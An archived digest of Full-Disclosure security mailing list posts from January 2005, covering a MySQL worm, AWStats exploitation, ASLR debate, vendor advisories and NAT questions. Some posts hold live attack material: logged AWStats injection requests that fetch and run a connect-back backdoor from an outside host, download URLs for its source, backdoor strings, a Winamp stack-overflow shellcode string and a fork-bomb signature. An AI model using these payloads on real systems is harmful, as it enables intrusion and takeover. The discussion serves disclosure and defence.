http://it.slashdot.org/it/05/01/27/1546222.shtml?tid=220&tid=172&tid=95

*Don't keep the port open!*
by hackergnu-designs.com
99.99% of people who run MySQL run it on the same machine as their
webserver that queries it. Most people don't actually do queries /across
the network/ to the database server.
Just run MySQL with --skip-networking at startup (skip-networking in
my.cnf), to disable MySQL from listening on port 3306.

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html


 
Re: [Full-Disclosure] spoolcll.exe - new worm being distributed viamysql vulnerability?

From: Jeremy Davis (jdaytonagmail.com)
Date: Thu Jan 27 2005 - 11:55:44 CST


Definitly confusing but I believe it stems from a week root passwd.
"the bot first has to authenticate to mysql as 'root'
user." then it seems to launch the exploit allowing it access to
create the dynamic libraries containing User Defined Functions.

On Thu, 27 Jan 2005 11:47:57 -0600, Dolan, Patrick
<Patrick.Dolanphns.com> wrote:
> From the article text:
>
> "The bot uses the "MySQL UDF Dynamic Library Exploit". In order to
> launch the exploit, the bot first has to authenticate to mysql as 'root'
> user. A long list of passwords is included with the bot, and the bot
> will brute force the password."
>
> Looks like this is small part exploit, and large part bad root password
> selection. Though I'm not even sure about the exploit part because the
> text later says:
>
> "This bot does not use any vulnerability in mysql. The fundamental
> weakness it uses is a week[sic] 'root' account."
>
> Patrick Dolan
> Information Security Analyst
>
> -----Original Message-----
> From: Jeremy Davis [mailto:jdaytonagmail.com]
> Sent: Thursday, January 27, 2005 11:23 AM
> To: Mike Bailey
> Cc: full-disclosurelists.netsys.com
> Subject: Re: [Full-Disclosure] spoolcll.exe - new worm being distributed
> viamysql vulnerability?
>
> Check out todays diary at SANS.
> http://isc.sans.org/
>
> On Thu, 27 Jan 2005 00:18:21 -0500, Mike Bailey <worriedgmail.com>
> wrote:
> > Aloha,
> >
> > Earlier tonight, i was sitting here at home doing some normal
> > browsing, and work and my firewall alerted me that a program called
> > spoolcll.exe was attempting to open up a port which i cannot remember
> > now.
> >
> > i tried killing it, but it just came back, over and over again each
> > time spawning itselfs on a new port.
> >
> > Registry says the worm created a service called "evmon", it cannot be
> > paused or stopped, but it can be disabled.
> >
> > The only information about this worm on google is a discussion at the
> > following url:
> > http://forums.whirlpool.net.au/forum-replies.cfm?t=291921&p=1
> > they are beginning to determinthat it is being distributed via a hole
> > in mysql.
> >
> > Do any of you know anything about this? Thanks in advance.
> >
> > --
> > Love,
> > Mike Bailey
> > _______________________________________________
> > Full-Disclosure - We believe in it.
> > Charter: http://lists.netsys.com/full-disclosure-charter.html
> >
> _______________________________________________
> Full-Disclosure - We believe in it.
> Charter: http://lists.netsys.com/full-disclosure-charter.html
>
> Disclaimer:
> This electronic message, including any attachments, is confidential and intended solely for use of the intended recipient(s). This message may contain information that is privileged or otherwise protected from disclosure by applicable law. Any unauthorized disclosure, dissemination, use or reproduction is strictly prohibited. If you have received this message in error, please delete it and notify the sender immediately.
>
>
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html


 
[Full-Disclosure] Re: [ GLSA 200501-36 ] AWStats: Remote code execution

From: Joao Victor A. Di Stasi (jvictor_rjyahoo.com.br)
Date: Thu Jan 27 2005 - 11:38:58 CST


Delian Krustev wrote:

>There's an exploit in the wild. Here's what it does:
>
>200.96.166.252 - - [26/Jan/2005:06:32:00 +0000] "GET /cgi-bin/awstats/awstats.pl?configdir=|cd%20/tmp;wget%20http://www.nokiacentrum.cz/dcha0s/cgi;ls%20-la%20cgi;chmod%20777%20cgi;./cgi;%00 HTTP/1.1" 200 538 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"
>200.96.166.252 - - [26/Jan/2005:06:34:30 +0000] "GET /cgi-bin/awstats/awstats.pl?configdir=|cd%20/tmp;wget%20http://www.nokiacentrum.cz/dcha0s/dc;chmod%20777%20dc;./dc%20cyber.yar.ru%208080;%00 HTTP/1.1" 200 554 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"
>
>I don't have the time to investigate the "cgi" and "dc" binaries.
>The "cgi" at least tries to daemonize and opens a TCP listening socket.
>They also try to replace the index page on the vulnerable site.
>
>
>
In the same site you can download :

wget http://www.nokiacentrum.cz/dcha0s/dc.c
wget http://www.nokiacentrum.cz/dcha0s/cgi.c

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html


 
Re: [Full-Disclosure] "Advances in Security" in the Linux Kernel and RedHat idiocy

From: Brad Spengler (spendergrsecurity.net)
Date: Thu Jan 27 2005 - 12:21:45 CST


> I think the joke is on you in this case. There is a large patch series of
> which you judge the first steps only. Those steps introduce the
> infrastructure and concepts into the kernel, and later patches will tweak
> the exact numbers to values with more entropy. ONCE THEY EXISTING
> INFRASTRUCTURE IS ACCEPTED AND DEBUGGED.
>
> Maybe you don't understand that, I assume a lot of the other readers of this
> list do. You don't plop a huge patch in the linux kernel in one chunk. You
> do it in nice small, incremental and debuggable steps.

If Exec-shield is any model for what you plan to turn this into, my
comments still apply. If you like, I'll simply send out the same email
months from now when you "finalize" this patch into the level of
security you claim it to be able to provide (which will never happen,
since you won't be providing any bruteforce deterrence, so it doesn't
matter if you increase the randomization by a couple more bits).

I should also add that the stack randomization present in this patch and
that in exec-shield can be bypassed by tossing enough data into the
stack, like "/bin/sh" over and over, since the amount of randomization
is smaller than the stack itself. I should also note that the latest
output of paxtest I could find against exec-shield shows that the amount
of randomization for shared libraries is the same as in the patch you
sent to LKML. So if your argument is that you agree these values are
stupidly low, you're not saying much about your own "enterprise-grade"
software ;)

I would also like to correct a mistake in my previous mail. The glibc
issues are indeed fixed in the latest FC3 glibc, which was released on
December 27th, 2004, nearly 3 1/2 months after the bug was initially
reported. The glibc update was not released as a security update
however, so many users are still affected (like the two Fedora
developers I contacted).

-Brad

-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.2.5 (GNU/Linux)

iD8DBQFB+TE3mHm2SUJF1GoRAocUAJ9lWKmXRmLfLKBI7AVj7hFiMRQpJgCcDqn8
BioS7BJGN38ChiJRZ5WdAiY=
=H4S9
-----END PGP SIGNATURE-----

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html


 
Re: [Full-Disclosure] "Advances in Security" in the Linux Kernel and RedHat idiocy

From: Michal Zalewski (lcamtufghettot.org)
Date: Thu Jan 27 2005 - 13:37:19 CST


On Thu, 27 Jan 2005, Brad Spengler wrote:

> I guess anyone who thinks that taking a hardcoded exploit and running it
> 256 times would always result in a successful exploit is stupid.

It would not always result in a successful exploitation; just as flipping
the coin twice is not a guarantee of getting tails once.

Other than that, the amount of randomization is indeed puny; but then,
even 32-bit randomization is a good defense only in certain situations,
and often, can be defeated with some time, aided by luck or a decent
NOP-equivalent sled.

--
------------------------- bash$ :(){ :|:&};: --
 Michal Zalewski * [http://lcamtuf.coredump.cx]
    Did you know that clones never use mirrors?
--------------------------- 2005-01-27 20:31 --

   http://lcamtuf.coredump.cx/photo/current/
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html


 
RE: [lists] [Full-Disclosure] Terminal Server vulnerabilities

From: ALD, Aditya, Aditya Lalit Deshmukh (aditya.deshmukhonline.gateway.expertworks.net)
Date: Thu Jan 27 2005 - 13:36:53 CST


>It's also only possible when you've got NetBIOS/CIFS open to
>the Internet,

Yes I know... That is why I said security thru obscurity

> With this argumentation, you could sell your firewalls.

No I would not I would use an ids with properly tuned sigs for the terminal
server abd then connect the terminal server via a proxy like vnc running
something over freebsd or linux. I would never allow a windows terminal
server to be directly be connected to the net...

-aditya

________________________________________________________________________
Delivered using the Free Personal Edition of Mailtraq (www.mailtraq.com)
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html


 
[Full-Disclosure] xinetd issue..

From: Juan Pablo Abuyeres (jpabuyertecnoera.com)
Date: Thu Jan 27 2005 - 13:48:05 CST


I have 2 servers running FC2, with xinetd-2.3.13-2 and
proftpd-1.2.10-8.1.fc2.dag. The ftp servers are configured to run
through xinetd.
xinetd is configured with "cps = 25 30", which is the default.
If I flood ftp connections, xinetd behaves like expected:

Jan 27 15:25:35 horus xinetd[628]: Deactivating service ftp due to
excessive incoming connections. Restarting in 30 seconds.
Jan 27 15:26:05 horus xinetd[628]: Activating service ftp

But a few days ago, my FTP server were down, and when I checked, this is
what I found:

Jan 25 21:05:40 horus xinetd[4479]: Deactivating service ftp due to
excessive incoming connections. Restarting in 30 seconds.
Jan 25 21:06:10 horus xinetd[4479]: bind failed (Address already in use
(errno = 98)). service = ftp
Jan 25 21:06:10 horus xinetd[4479]: Error activating service ftp
Jan 25 21:06:10 horus xinetd[32743]: Failed to contact identity server
at 83.198.168.197: timeout

Jan 26 10:00:28 horus xinetd[29729]: Service ftp: server exit with 0
running servers
Jan 26 11:35:51 horus xinetd[29729]: Deactivating service ftp due to
excessive incoming connections. Restarting in 30 seconds.
Jan 26 11:36:21 horus xinetd[25685]: Failed to contact identity server
at 195.7.124.194: timeout
Jan 26 11:36:21 horus xinetd[29729]: bind failed (Address already in use
(errno = 98)). service = ftp
Jan 26 11:36:21 horus xinetd[29729]: Error activating service ftp

I've tried to reproduce this, with no luck. This happend on both servers
at almost the same time. They have the same install base and rpms. Can
anybody give some advice on this please?

Thank you.

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html


 
Re: [lists] [Full-Disclosure] Terminal Server vulnerabilities

From: Jan Muenther (jan.muenthernruns.com)
Date: Thu Jan 27 2005 - 14:11:09 CST


> No I would not I would use an ids with properly tuned sigs for the terminal
> server abd then connect the terminal server via a proxy like vnc running
> something over freebsd or linux. I would never allow a windows terminal
> server to be directly be connected to the net...

Spot the two obvious mistakes in this reply.

I retreat from the discussion, should've held back my first comment.

j.
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html


 
RE: [Full-Disclosure] Terminal Server vulnerabilities

From: Stuart Fox (DSL AK) (StuartFdatacom.co.nz)
Date: Thu Jan 27 2005 - 14:27:39 CST


>> But I would point out something much more important : there are many
>> more local exploits than remote (on Windows just like any other OS).
>>
>> Local exploits : about 1-2 a month
>> * POSIX - OS/2 subsystem exploitation
>> * Debugging subsystem exploitation (DebPloit)
>> * 16-bit subsystem exploitation (NTVDM)
>>* Shatter Attacks
>> * Etc.
>>
>> Remote exploits : about once a year
>> * RPC/DCOM (blaster)
>> * LSASS (sasser)
>>
>> Basically, if you are logged in as an unpriviledged user on a Terminal
>> Server, you can easily become SYSTEM. If this Terminal Server is also a
>> Domain Controller, game over.
>
>You forgot one important factor - the use of IE and Outlook for the fast
>direct-to-customer delivery of local exploits. Which *also* results in
>a Game Over....
 
Assuming that the IE/Outlook bugs are privilege escalation bugs. There seem to be relatively few of those - all of the recent ones have given you credentials of the local user, not localsystem (or even admin).

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html


 
[Full-Disclosure] CarolinaCon 2005 announcement

From: Vic Vandal (vvandalwell.com)
Date: Thu Jan 27 2005 - 16:19:32 CST


Various chapters of NC-2600 (Raleigh, Wilmington, Charlotte,
Asheville, etc) are proud to announce the coming of:
"CarolinaCon-2005"
The event will be June 10th-12th in Raleigh, NC.

If interested in attending and/or presenting, please see the
following link for existing and emerging details:
http://www.carolinacon.org

The only currently active links are Location (where registration/
reservations can be made) and Speakers (kinda obvious).

Peace,
Vic
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html


 
[Full-Disclosure] Re: Full-Disclosure Digest, Vol 2, Issue 58

From: Luisma (lbarreirogmail.com)
Date: Thu Jan 27 2005 - 16:06:16 CST


On Thu, 27 Jan 2005 11:51:08 -0500 (EST),
full-disclosure-requestlists.netsys.com
> Message: 8
> Date: Thu, 27 Jan 2005 00:18:21 -0500
> From: Mike Bailey <worriedgmail.com>
> Subject: [Full-Disclosure] spoolcll.exe - new worm being distributed
> via mysql vulnerability?
> To: full-disclosurelists.netsys.com
> Message-ID: <a50eeaa105012621182064e7a9mail.gmail.com>
> Content-Type: text/plain; charset=US-ASCII
>
> Aloha,
>
> Earlier tonight, i was sitting here at home doing some normal
> browsing, and work and my firewall alerted me that a program called
> spoolcll.exe was attempting to open up a port which i cannot remember
> now.
>
> i tried killing it, but it just came back, over and over again each
> time spawning itselfs on a new port.
>
> Registry says the worm created a service called "evmon", it cannot be
> paused or stopped, but it can be disabled.
>
> The only information about this worm on google is a discussion at the
> following url: http://forums.whirlpool.net.au/forum-replies.cfm?t=291921&p=1
> they are beginning to determinthat it is being distributed via a hole
> in mysql.
>
> Do any of you know anything about this? Thanks in advance.
>
> --
> Love,
> Mike Bailey
>
> ------------------------------

It's a sort of new worm looking for MySQL weak root passwords. You get
more info at Sans:

http://isc.sans.org/diary.php?isc=a508f4a185755af19ea8bd45444a570b

Boot in Safe Mode and delete that file. Then reboot. Of course, change
your admin pass and firewall tcp port 3306.

--
Saludos/Regards

Luisma
-------------------------------------------------------------
Chaos reigns within. Reflect, repent, and reboot. Order shall return.
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html


 
[Full-Disclosure] MDKSA-2005:024 - Updated evolution packages fix vulnerability

From: Mandrakelinux Security Team (securitylinux-mandrake.com)
Date: Thu Jan 27 2005 - 16:20:36 CST


-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

 _______________________________________________________________________

                 Mandrakelinux Security Update Advisory
 _______________________________________________________________________

 Package name: evolution
 Advisory ID: MDKSA-2005:024
 Date: January 27th, 2005

 Affected versions: 10.0, 10.1, Corporate Server 3.0
 ______________________________________________________________________

 Problem Description:

 Max Vozeler discovered an integer overflow in the camel-lock-helper
 application. This application is installed setgid mail by default.
 A local attacker could exploit this to execute malicious code with
 the privileges of the "mail" group; likewise a remote attacker could
 setup a malicious POP server to execute arbitrary code when an
 Evolution user connects to it.
 
 The updated packages have been patched to prevent this problem.
 _______________________________________________________________________

 References:

  http://cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2005-0102
 ______________________________________________________________________

 Updated Packages:
  
 Mandrakelinux 10.0:
 3397788a5d8a84d8fd1294225bdfa546 10.0/RPMS/evolution-1.4.6-5.1.100mdk.i586.rpm
 0e2280ac393ca059ae4d19b3db8289ee 10.0/RPMS/evolution-devel-1.4.6-5.1.100mdk.i586.rpm
 6d1f2aa61768f1cebeeb5454abbc4a67 10.0/RPMS/evolution-pilot-1.4.6-5.1.100mdk.i586.rpm
 cc0058793a3353fd9d420da898e42213 10.0/SRPMS/evolution-1.4.6-5.1.100mdk.src.rpm

 Mandrakelinux 10.0/AMD64:
 2cbb561ccbd6a2a30c4830e4bdae4c17 amd64/10.0/RPMS/evolution-1.4.6-5.1.100mdk.amd64.rpm
 35673a1c5f7c595930def4776bfeba12 amd64/10.0/RPMS/evolution-devel-1.4.6-5.1.100mdk.amd64.rpm
 091ef5247fce276a0c8fffd3efd2d967 amd64/10.0/RPMS/evolution-pilot-1.4.6-5.1.100mdk.amd64.rpm
 cc0058793a3353fd9d420da898e42213 amd64/10.0/SRPMS/evolution-1.4.6-5.1.100mdk.src.rpm

 Mandrakelinux 10.1:
 0b3320cd8f1209071dbb38de3f5f4c62 10.1/RPMS/evolution-2.0.3-1.2.101mdk.i586.rpm
 d7cf293651f49ef222da230f4ad3cb2d 10.1/RPMS/evolution-devel-2.0.3-1.2.101mdk.i586.rpm
 89f0d1b662517cb0756eec458cd6c234 10.1/RPMS/evolution-pilot-2.0.3-1.2.101mdk.i586.rpm
 ee51751a3cabf18e53bd1e3092da3223 10.1/SRPMS/evolution-2.0.3-1.2.101mdk.src.rpm

 Mandrakelinux 10.1/X86_64:
 984eae27bc6fbebcf32002ba61b17670 x86_64/10.1/RPMS/evolution-2.0.3-1.2.101mdk.x86_64.rpm
 8bc7680f0095b4153a882716f8485daf x86_64/10.1/RPMS/evolution-devel-2.0.3-1.2.101mdk.x86_64.rpm
 3db68c56395c13a3fe458645bb1c9975 x86_64/10.1/RPMS/evolution-pilot-2.0.3-1.2.101mdk.x86_64.rpm
 ee51751a3cabf18e53bd1e3092da3223 x86_64/10.1/SRPMS/evolution-2.0.3-1.2.101mdk.src.rpm

 Corporate Server 3.0:
 6a8867e05261d45f89ff09e9cb05ff31 corporate/3.0/RPMS/evolution-1.4.6-5.1.C30mdk.i586.rpm
 a9a7a5c41a121178a2fffbff6a8764a3 corporate/3.0/RPMS/evolution-devel-1.4.6-5.1.C30mdk.i586.rpm
 4d6f9b339eb9cc545e9b562d8223fca8 corporate/3.0/RPMS/evolution-pilot-1.4.6-5.1.C30mdk.i586.rpm
 854f366f4a1c868e905888a46d06603a corporate/3.0/SRPMS/evolution-1.4.6-5.1.C30mdk.src.rpm

 Corporate Server 3.0/x86_64:
 194f59a32369684d6642067924937dcd x86_64/corporate/3.0/RPMS/evolution-1.4.6-5.1.C30mdk.x86_64.rpm
 79de9373078067bc09779afb01b2a2f1 x86_64/corporate/3.0/RPMS/evolution-devel-1.4.6-5.1.C30mdk.x86_64.rpm
 a050fc93565161d237e141feb014c9f1 x86_64/corporate/3.0/RPMS/evolution-pilot-1.4.6-5.1.C30mdk.x86_64.rpm
 854f366f4a1c868e905888a46d06603a x86_64/corporate/3.0/SRPMS/evolution-1.4.6-5.1.C30mdk.src.rpm
 _______________________________________________________________________

 To upgrade automatically use MandrakeUpdate or urpmi. The verification
 of md5 checksums and GPG signatures is performed automatically for you.

 All packages are signed by Mandrakesoft for security. You can obtain
 the GPG public key of the Mandrakelinux Security Team by executing:

  gpg --recv-keys --keyserver pgp.mit.edu 0x22458A98

 You can view other update advisories for Mandrakelinux at:

  http://www.mandrakesoft.com/security/advisories

 If you want to report vulnerabilities, please contact

  security_linux-mandrake.com

 Type Bits/KeyID Date User ID
 pub 1024D/22458A98 2000-07-10 Linux Mandrake Security Team
  <security linux-mandrake.com>
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.2.4 (GNU/Linux)

iD8DBQFB+Wk0mqjQ0CJFipgRAsk3AKDL8HPSAwU/LNO2IDfsibj9wi1cdgCgzU63
/VJIUnKfHjOigzKL4Kcg5/Q=
=MPF+
-----END PGP SIGNATURE-----
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html


 
Re: [Full-Disclosure] Re: [ GLSA 200501-36 ] AWStats: Remote codeexecution

From: morning_wood (se_cur_ityhotmail.com)
Date: Wed Jan 26 2005 - 21:16:28 CST


> I don't have the time to investigate the "cgi" and "dc" binaries.
> The "cgi" at least tries to daemonize and opens a TCP listening socket.
> They also try to replace the index page on the vulnerable site.

cgi
00001495 00001495 0 /dev/tty
0000149E 0000149E 0 socket
000014AA 000014AA 0 listen
000014C0 000014C0 0 PsychoPhobia Backdoor is starting...

0000254E 0000254E 0 init.c

dc
000009C0 000009C0 0 Welcome to Data Cha0s Connect Back Shell
000009E9 000009E9 0 No More Damn Issue Commands
00000A20 00000A20 0 Data Cha0s Connect Back Backdoor
00000A42 00000A42 0 /bin/sh
00000A4D 00000A4D 0 XTERM=xterm
00000A59 00000A59 0 HISTFILE=
00000A63 00000A63 0 SAVEHIST=
00000A6D 00000A6D 0 Usage: %s [Host] <port>
00000A86 00000A86 0 [*] Dumping Arguments
00000A9C 00000A9C 0 [*] Resolving Host Name
00000AB4 00000AB4 0 [*] Connecting...
00000AC6 00000AC6 0 [*] Spawning Shell
00000AD9 00000AD9 0 [*] Detached

00004321 00004321 0 dc-connectback.c

cheers,
m.w

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html


 
[Full-Disclosure] [OpenPKG-SA-2005.004] OpenPKG Security Advisory (sasl)

From: OpenPKG (openpkgopenpkg.org)
Date: Fri Jan 28 2005 - 01:39:27 CST


-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

________________________________________________________________________

OpenPKG Security Advisory The OpenPKG Project
http://www.openpkg.org/security.html http://www.openpkg.org
openpkg-securityopenpkg.org openpkgopenpkg.org
OpenPKG-SA-2005.004 28-Jan-2005
________________________________________________________________________

Package: sasl
Vulnerability: arbitrary code execution
OpenPKG Specific: no

Affected Releases: Affected Packages: Corrected Packages:
OpenPKG CURRENT <= sasl-2.1.19-20040920 >= sasl-2.1.20-20041025
OpenPKG 2.2 <= sasl-2.1.19-2.2.0 >= sasl-2.1.19-2.2.1
OpenPKG 2.1 <= sasl-2.1.18-2.1.0 >= sasl-2.1.18-2.1.1

Affected Releases: Dependent Packages:
OpenPKG CURRENT imapd kolab openldap::with_sasl
                     postfix::with_sasl sendmail::with_sasl
OpenPKG 2.2 imapd kolab openldap::with_sasl
                     postfix::with_sasl sendmail::with_sasl
OpenPKG 2.1 imapd kolab openldap::with_sasl
                     postfix::with_sasl sendmail::with_sasl

Description:
  A setuid and setgid application vulnerability was found in the Cyrus
  SASL library [0]. At application startup, libsasl2 attempts to build a
  list of all available SASL plugins which are available on the system.
  To do so, the library searches for and attempts to load every shared
  library found within the plugin directory. This location can be set
  with the SASL_PATH environment variable.

  In situations where an untrusted local user can affect the environment
  of a privileged process, this behavior could be exploited to run
  arbitrary code with the privileges of a setuid or setgid application.
  The Common Vulnerabilities and Exposures (CVE) project assigned the
  identifier CAN-2004-0884 [1] to the problem.

  Please check whether you are affected by running "<prefix>/bin/openpkg
  rpm -q sasl". If you have the "sasl" package installed and its version
  is affected (see above), we recommend that you immediately upgrade it
  (see Solution) and any dependent packages as well [2][3].

Solution:
  Select the updated source RPM appropriate for your OpenPKG release
  [4][5], fetch it from the OpenPKG FTP service [6][7] or a mirror
  location, verify its integrity [8], build a corresponding binary RPM
  from it [2] and update your OpenPKG installation by applying the
  binary RPM [3]. For the most recent release OpenPKG 2.2, perform the
  following operations to permanently fix the security problem (for
  other releases adjust accordingly).

  $ ftp ftp.openpkg.org
  ftp> bin
  ftp> cd release/2.2/UPD
  ftp> get sasl-2.1.19-2.2.1.src.rpm
  ftp> bye
  $ <prefix>/bin/openpkg rpm -v --checksig sasl-2.1.19-2.2.1.src.rpm
  $ <prefix>/bin/openpkg rpm --rebuild sasl-2.1.19-2.2.1.src.rpm
  $ su -
  # <prefix>/bin/openpkg rpm -Fvh <prefix>/RPM/PKG/sasl-2.1.19-2.2.1.*.rpm

  Additionally, we recommend that you rebuild and reinstall
  any dependent packages (see above) as well [2][3].
________________________________________________________________________

References:
  [0] http://asg.web.cmu.edu/sasl/
  [1] http://cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2004-0884
  [2] http://www.openpkg.org/tutorial.html#regular-source
  [3] http://www.openpkg.org/tutorial.html#regular-binary
  [4] ftp://ftp.openpkg.org/release/2.2/UPD/sasl-2.1.19-2.2.1.src.rpm
  [5] ftp://ftp.openpkg.org/release/2.1/UPD/sasl-2.1.18-2.1.1.src.rpm
  [6] ftp://ftp.openpkg.org/release/2.2/UPD/
  [7] ftp://ftp.openpkg.org/release/2.1/UPD/
  [8] http://www.openpkg.org/security.html#signature
________________________________________________________________________

For security reasons, this advisory was digitally signed with the
OpenPGP public key "OpenPKG <openpkgopenpkg.org>" (ID 63C4CB9F) of the
OpenPKG project which you can retrieve from http://pgp.openpkg.org and
hkp://pgp.openpkg.org. Follow the instructions on http://pgp.openpkg.org/
for details on how to verify the integrity of this advisory.
________________________________________________________________________

-----BEGIN PGP SIGNATURE-----
Comment: OpenPKG <openpkgopenpkg.org>

iD8DBQFB+ewigHWT4GPEy58RAjdyAJsFrQUG5q9DjmwiGvccEEIxU/mXbACg431X
BjzkxqCH71N5ZEMlDoGBGwU=
=kOee
-----END PGP SIGNATURE-----
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html


 
[Full-Disclosure] NAT router inbound network traffic subversion

From: Kristian Hermansen (khermansenht-technology.com)
Date: Fri Jan 28 2005 - 00:12:19 CST


I have Googled around and asked a highly-respected Professor at my
University whether it is possible to direct packets behind a NAT router
without the internal 192.168.x.x clients first requesting a connection
to the specific host outside. The answer I received is "not possible".
I also asked if this can be thought of as a security feature, to which
the reply was again "yes".

Now, I wouldn't place all my bets on his answer and I am calling on
someone out there to clear up my question. If NAT really does only
allow inbound connections with a preliminary request as he suggests, it
seems that the only way to get an "unauthorized" packet behind the
router is by some flaw in the firmware of the device.

How about if the client has requested a connection to Google.com from
behind his Linksys home NAT router: would it be possible for an outside
attacker to spoof packets from Google's IP to get packets into the
network? Or do we need to know the sequence numbers as well? Or is
there an even more devious way to get packets on the inside without a
client's initiative?

Has there been any research into this? Are there statistics on worm
propagation and exploited network hosts in relation to those individuals
that did not own routers (and instead connected directly to their
modem)? If *all* home users on the Internet had NAT routers during the
summer of 2003, would we have significantly slowed the spread of
Blaster? I believe these all to be very important questions and the
security aspects of the ability to route packets behind NAT really
interests me...maybe some of you can elaborate :-)
--
Kristian Hermansen <khermansenht-technology.com>

-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.2.4 (GNU/Linux)

iD8DBQBB+dfCISAslhPnyaURAoDSAJ4y2/OfmL3uqQR6XeiabGrELtyPDQCaAiQP
Vk+Kzv3LA0jBaj5I8VmzWfg=
=AE/w
-----END PGP SIGNATURE-----

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html


 
Re: [Full-Disclosure] "Advances in Security" in the Linux Kernel and RedHat idiocy

From: Brad Spengler (spendergrsecurity.net)
Date: Thu Jan 27 2005 - 13:44:51 CST


On Thu, Jan 27, 2005 at 08:37:19PM +0100, Michal Zalewski wrote:
> On Thu, 27 Jan 2005, Brad Spengler wrote:
>
> > I guess anyone who thinks that taking a hardcoded exploit and running it
> > 256 times would always result in a successful exploit is stupid.
>
> It would not always result in a successful exploitation; just as flipping
> the coin twice is not a guarantee of getting tails once.

Of course, but you get the idea. Your chances of succeeding after 256
tries are such that it is highly probable you wouldn't fail (and in
fact, if the process you're attacking is a forking daemon like apache,
if you iterate through all the possibilities, you do indeed have a 100%
chance of succeeding after 256 tries).

> Other than that, the amount of randomization is indeed puny; but then,
> even 32-bit randomization is a good defense only in certain situations,
> and often, can be defeated with some time, aided by luck or a decent
> NOP-equivalent sled.

Indeed, and only PaX/grsecurity handles these things, which is why it is
useful in our case. However, attempting to use weak randomization as
RedHat is trying is nothing more than trivial obfuscation, which should
have no place in the kernel. All it does is give people a false sense
of security, and allow RedHat to make claims that they're preventing
75% of exploits with Exec-shield (of course ignoring that all such
exploits that failed could be easily rewritten to succeed). Things
have really taken a turn for the worse: Linus used to be against having
only a non-executable stack because it's trivially evaded. Now he's
all for something that is even more obfuscation than having only a
non-executable stack: the exploits don't even have to be rewritten in
this case. This all reeks of security ignorance and politics.

-Brad

-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.2.5 (GNU/Linux)

iD8DBQFB+USxmHm2SUJF1GoRAhWcAJ0fU0gkYvfvljkEF8kto8ZNTfQi+wCfU5Dy
30IEbAqV9uUjfyE5/bFQOLM=
=sd4+
-----END PGP SIGNATURE-----

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html


 
[Full-Disclosure] Sify: ISP in India using hubs to provide connectivity

rohitkritikalsolutions.com
Date: Thu Jan 27 2005 - 22:56:41 CST


hi,
 This one is the most obvious problem, I am nevertheless reporting it
since the ISP concerned has refused to take any action.

Sify (www.sify.com/bbhome) is an ISP in India with second largest customer
base and largest among broadband users. To provide broadband, they install
a radio link near your place and than provide connectivity to many users
via a HUB, not even a switch! The problem is obvious. I can listen to
anyone's conversation and do anything at all, using stuff like dnsspoof
and the likes. To top it all, they refuse to acknowledge that this is a
problem warn that in case you run sniffers on our network, we will
prosecute you! As if everyone who sniffs traffic is going to tell them.
In a place like India where people are still on windows 98, scope of a
major virus attack becomes many fold in such situations.
Thanks
Rohit
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html


 
Re: [Full-Disclosure] NAT router inbound network traffic subversion

From: morning_wood (se_cur_ityhotmail.com)
Date: Fri Jan 28 2005 - 05:32:20 CST


scenario...

NAT client browses web...
NAT client initates a HTTP request to do this...
ROUTER returns the request to NAT client...
( normal activity )

attacker website exploits client browser...
exploit drops and executes "badfile.exe"
"badfile.exe" hooks iexplore.exe...

"badfile.exe" is 'reverse connecting trojan'...
"badfile.exe" initiates a HTTP request to do this...
attacker's "badfile.exe"' 'client' is waiting with a HTTP server...

the new hooked browser initiates a HTTP request to the attacker.
NAT client is now connected to the attacker
through the ROUTER ( kinda like browsing the web huh? )
attacker now has unrestricted packet via the NAT client,
that is where ??? BEHIND YOUR ROUTER

atacker now can do a he wishes to the rest of your network
( GAME OVER )

Cheers,
m.w
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html


 
[Full-Disclosure] Winamp Exploit (POC) 5.08 Stack Overflow

From: Rojodos (rojo2_bugtraqyahoo.es)
Date: Fri Jan 28 2005 - 06:22:55 CST


Hello :)

Ive coded an exploit about this vulnerability, using the advisory "NSFOCUS SA2005-01 : Buffer Overflow in WinAMP in_cdda.dll CDA Device Name" as a guide. The advisory is very good, so its very easy to code the exploit.

This code:

cda://AAAABBBBCCCCDDDDEEEEFFFFGGGGHHHnT _IJJJ3WEcEmEdE.EeExEeDwP]S

Should spawn a shell in a WinXP SP1 with Winamp 5.08, I have used as offset 0x5f20546e olepro32.dll, a "jmp esp" (nT _)

3WEcEmEdE.EeExEeDwP]S is the scode in "printable" chars.

